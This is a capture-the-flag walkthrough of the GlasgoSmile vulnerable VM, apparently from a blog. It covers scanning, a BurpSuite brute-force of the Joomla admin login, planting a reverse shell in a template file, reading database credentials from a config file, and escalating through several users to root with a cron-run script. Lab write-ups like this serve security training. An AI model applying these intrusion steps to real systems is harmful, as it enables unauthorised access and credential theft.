GlasgoSmile Walkthrough

Scanning the target with nmap -A -T4 -p- 192.168.1.17 -vv

Port 80 is open we scan it with dirb http://192.168.1.17 /usr/share/dirb/wordlist/big.txt

t’s running Joomla service and we got a page where the Joker photo is and the other is for welcome page and other page to login to Joomla panel:

192.168.1.17/

http://192.168.1.17/joomla/index.php

http://192.168.1.17/joomla/administrator/index.php

We interested in the administrator page we’re going to start BurpSuite and try to login, but first let’s make a list of password from the index.php page as it has some names within it:

We start BurpSuite and from the login page we put the username Joomla (default) and any password such 123456 and let BurpSuite catch the login page and we send it to Intruder tab:

In the Intruder tab we only mark the password 123456 and then we put out list we made with the names and start the attack:

We got the password “Gotham” we login now to the Joomla panel:

Now we need to upload a reverse shell, heat to Extensions tab and from there choose Templates:

From Templates choose Beez3

Now from the files of the Beez3 Templates choose the index.php page and clear it and paste the reverse shell code:

Make ready with a listening port 4444 in my case and click on “Template Preview” and you will get a reverse shell back to your machine:

Ok after looking around i found that the host running Mysql and i found the configuration file in /var/www/html/joomla/configuration.php and inside it we can see the password and database:

So we access the database by mysql -u joomla -p babyjoker

Next, we view the database and tables:

The password for rob is in base64 and it’s ???AllIHaveAreNegativeThoughts??? now we log with rob:

And the first user.txt for rob:

We can login in with Rob via ssh, because it’s easier too.

In Rob directory there is a file named Abnerineedyourhelp looks like this:

I spent a lot of time and finally remembered i solver another challenge like this one before with the same gibberish letters (chanakya), and it’s a cipher coding named ROT13 and i found a GITHUB link to how to decipher this, just tweak the settings to equal 1:

Now we have words and letters we can understand, the last line is code64 and it’s a password for the next user Abner

The password is I33hope99my0death000makes44more8cents00than0my0life0

The user2.txt for Abner:

Found something interesting in the .bash_history file:

Then used find / -type f -name “.*” to look for hidden files and found it:

Now we go to that directory and copy the file back to Abner directory and unzip it:

And we got the password scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz now we login as penguin:

The file .trash_old is our way to the root, just by viewing the file we can find a bash inside we need to put our reverse shell and save it and wait for the shell to start:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s